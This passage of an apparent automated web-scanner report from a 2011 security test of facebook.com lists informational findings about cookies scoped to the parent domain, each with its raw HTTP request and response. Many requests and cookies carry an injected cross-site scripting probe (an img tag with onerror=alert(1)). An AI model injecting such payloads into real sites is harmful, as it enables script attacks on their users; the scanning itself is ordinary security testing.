GET /1242845259 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; lsd=zTWKd; datr=ituyTcnawc6q7VcE0gibPCo2; act=1304613672018%2F1; L=2; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F12; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F1242845259e76bc%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eb0233c9330b; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2F1242845259e76bc%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eb0233c9330b; wd=1022x1007

Response

HTTP/1.1 404 Not Found
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2F1242845259; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.43.96.57
X-Cnection: close
Date: Thu, 05 May 2011 11:56:38 GMT
Content-Length: 11260

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

10.15. http://www.facebook.com/1242845259e76bc%3Cimg%20src=a%20onerror=alert(1)%3Eb0233c9330b

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /1242845259e76bc%3Cimg%20src=a%20onerror=alert(1)%3Eb0233c9330b

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:
  • reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F12; path=/; domain=.facebook.com
  • reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F1242845259e76bc%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eb0233c9330b; path=/; domain=.facebook.com
  • reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2F1242845259e76bc%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eb0233c9330b; path=/; domain=.facebook.com
  • wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /1242845259e76bc%3Cimg%20src=a%20onerror=alert(1)%3Eb0233c9330b HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://burp/show/12
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; lsd=zTWKd; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; datr=ituyTcnawc6q7VcE0gibPCo2; act=1304613672018%2F1; L=2; reg_fb_ref=https%3A%2F%2Fwww.facebook.com%2Fhelp%2Fcontact.php%3Fshow_form%3Dcannot_identify%26flow%3Dpw_reset; wd=1022x1007

Response

HTTP/1.1 404 Not Found
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Set-Cookie: reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F12; path=/; domain=.facebook.com
Set-Cookie: reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F1242845259e76bc%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eb0233c9330b; path=/; domain=.facebook.com
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2F1242845259e76bc%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eb0233c9330b; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.43.102.67
X-Cnection: close
Date: Thu, 05 May 2011 11:56:26 GMT
Content-Length: 11478

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

10.16. http://www.facebook.com/2008/fbml

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /2008/fbml

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:
  • reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2F2008%2Ffbml; path=/; domain=.facebook.com
  • wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /2008/fbml HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 404 Not Found
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2F2008%2Ffbml; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.145.67
Connection: close
Date: Thu, 05 May 2011 11:40:11 GMT
Content-Length: 11283

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

10.17. http://www.facebook.com/AOLrealestate

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /AOLrealestate

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:
  • wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /AOLrealestate HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.181.29
Connection: close
Date: Thu, 05 May 2011 11:42:19 GMT
Content-Length: 37726

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schem
...[SNIP]...

10.18. http://www.facebook.com/BPAmerica

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /BPAmerica

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:
  • wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /BPAmerica HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=xCqlG; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=907x1007; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.32.217.127
Connection: close
Date: Thu, 05 May 2011 10:56:36 GMT
Content-Length: 183008

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schem
...[SNIP]...

10.19. http://www.facebook.com/DailyFinance

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /DailyFinance

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:
  • wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /DailyFinance HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.168.69
Connection: close
Date: Thu, 05 May 2011 11:42:19 GMT
Content-Length: 197840

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schem
...[SNIP]...

10.20. http://www.facebook.com/HockeyKen

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /HockeyKen

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:
  • reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2FHockeyKen; path=/; domain=.facebook.com
  • wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /HockeyKen HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2FHockeyKen; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.195.39
Connection: close
Date: Thu, 05 May 2011 11:42:23 GMT
Content-Length: 79629

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ogp.me/ns#" xml:lang="en" l
...[SNIP]...

10.21. http://www.facebook.com/KickIceForever

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /KickIceForever

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:
  • reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2FKickIceForever; path=/; domain=.facebook.com
  • wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /KickIceForever HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2FKickIceForever; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.194.43
Connection: close
Date: Thu, 05 May 2011 11:42:23 GMT
Content-Length: 72255

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ogp.me/ns#" xml:lang="en" l
...[SNIP]...

10.22. http://www.facebook.com/LadyBonesie

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /LadyBonesie

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:
  • wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /LadyBonesie HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.167.61
Connection: close
Date: Thu, 05 May 2011 11:43:11 GMT
Content-Length: 14829

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

10.23. http://www.facebook.com/Loizza

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /Loizza

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:
  • reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2FLoizza; path=/; domain=.facebook.com
  • wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Loizza HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2FLoizza; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.190.69
Connection: close
Date: Thu, 05 May 2011 11:42:51 GMT
Content-Length: 228078

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ogp.me/ns#" xml:lang="en" l
...[SNIP]...

10.24. http://www.facebook.com/aim

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /aim

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:
  • wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /aim HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.155.37
Connection: close
Date: Thu, 05 May 2011 11:40:16 GMT
Content-Length: 170476

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schem
...[SNIP]...

10.25. http://www.facebook.com/ajax/intl/language_dialog.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /ajax/intl/language_dialog.php

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:
  • wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ajax/intl/language_dialog.php HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=xCqlG; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=907x1007; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS;

Response

HTTP/1.1 200 OK
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
X-XSS-Protection: 0
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.33.31.123
Connection: close
Date: Thu, 05 May 2011 10:56:34 GMT
Content-Length: 41058

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

10.26. http://www.facebook.com/ajax/reg_birthday_help.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /ajax/reg_birthday_help.php

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:
  • wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ajax/reg_birthday_help.php?__a=1&__d=1 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/r.php?profile_id=100000824820783&next=http%3A%2F%2Fwww.facebook.com%2Fprofile.php%3Fid%3D100000824820783
X-SVN-Rev: 374220
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; lsd=zTWKd; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=1022x1007

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 707
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-Frame-Options: DENY
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
X-FB-Server: 10.52.163.55
X-Cnection: close
Date: Thu, 05 May 2011 11:43:24 GMT

for (;;);{"__ar":1,"payload":{"secure":false,"title":{"__html":"Why do I need to provide my birthday?"},"className":"birthday_warning_popup","body":{"__html":"Facebook requires all users to provide th
...[SNIP]...

10.27. http://www.facebook.com/ajax/register/logging.php

Summary

Severity:   Information
